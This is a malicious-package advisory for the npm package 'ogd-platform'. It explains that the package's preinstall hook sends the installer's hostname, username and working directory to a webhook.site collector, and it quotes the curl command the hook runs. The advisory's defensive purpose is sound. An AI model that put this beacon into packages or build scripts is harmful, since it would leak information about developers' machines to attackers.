VYPR

npm · Malicious package advisory

Malware

ogd-platform

MAL-2026-5828

Malicious code in ogd-platform (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (f17f2c263db2adee12698bd9046668b9b674bcdf063b959f54841914a6028931)
The package contains only a package.json with a preinstall lifecycle script and ships no actual functionality despite advertising itself as an 'Open Government Data Platform core'. On `npm install`, the preinstall hook runs `curl --data-urlencode "info=$(hostname && whoami && pwd)"` against a webhook.site collector URL, sending the installer's hostname, username, and current working directory to an attacker-controlled endpoint. The empty tarball plus recon beacon is the canonical dependency-confusion / namespace-squat reconnaissance shape: an internal build expecting a private `ogd-platform` package would resolve to this public registry entry and leak host identifiers to the attacker on install.

Compromised versions (1)

  • 1.0.0

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.